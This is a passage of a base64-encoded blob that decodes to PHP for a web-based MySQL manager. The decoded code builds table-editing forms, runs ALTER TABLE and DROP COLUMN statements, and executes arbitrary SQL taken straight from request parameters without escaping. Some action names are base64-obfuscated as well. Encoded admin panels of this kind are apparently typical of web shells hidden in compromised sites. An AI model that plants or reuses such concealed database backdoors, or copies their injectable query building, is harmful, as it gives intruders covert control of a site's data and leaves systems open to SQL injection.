yMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFx